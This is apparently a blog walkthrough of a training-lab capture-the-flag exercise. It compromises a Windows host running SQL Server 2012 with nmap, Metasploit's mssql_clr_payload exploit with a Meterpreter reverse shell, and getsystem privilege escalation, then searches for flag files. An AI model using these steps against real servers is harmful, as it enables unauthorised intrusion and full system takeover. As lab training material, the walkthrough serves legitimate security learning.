Disclaimer

The content of this article is for educational purposes only. Do not use the techniques described here on any system without the explicit consent of the owner.

We can start by doing a scan with nmap.

nmap -sS -p- -sV -O target.ine.local
None

The machine is a Windows system with standard services enabled.

For the next steps, we will need to use Metasploit. We can configure a new session with global variables to simplify our work.

service postgresql start

msfconsole -q
setg RHOSTS target.ine.local
setg RHOST target.ine.local

Gain access to the MSSQLSERVER account on the target machine to retrieve the first flag.

Based on the nmap scan, we know that the target is running Microsoft SQL Server 2012. We can search for a possible exploit for this version in Metasploit.

search MSSQL 2012
None

The first exploit seems interesting. We should try running it against the target to see if it works.

use exploit/windows/mssql/mssql_clr_payload
set PAYLOAD windows/x64/meterpreter/reverse_tcp
run
None

We obtained a valid session, so now we can search for the first flag on the system.

shell
cd \
type flag1.txt

Locate the second flag within the Windows configuration folder.

We will see an error if we try to access the given folder because we don't have enough permissions.

None

We can temporarily return to Meterpreter by pressing CTRL+C.

Then, we can check the permissions of the current users to see a possible way for privilege escalation.

The current user has the SeImpersonatePrivilege permission. This means we can easily escalate to high-privilege users directly with Meterpreter.

getprivs
getsystem
None

We can now go back to the shell and list the content of the config folder.

None

The third flag is also hidden within the system directory. Find it to uncover a hint for accessing the final flag.

There is no file named "flag3" inside the System32 folder. However, we can search for files whose names contain the word "flag."

dir *flag* /s
None

We found a text file containing the third flag

cd C:\Windows\System32\drivers\etc
type EscaltePrivilageToGetThisFlag.txt

Investigate the Administrator directory to find the fourth flag.

The last flag can be found on the Desktop of the admin user.

cd c:\Users\Administrator\Desktop
type flag4.txt
None

If you enjoyed this article, feel free to leave a clap and follow me for more content like this.

Let me know in the comments if you have any questions or doubts.

Happy hacking! 🧑‍💻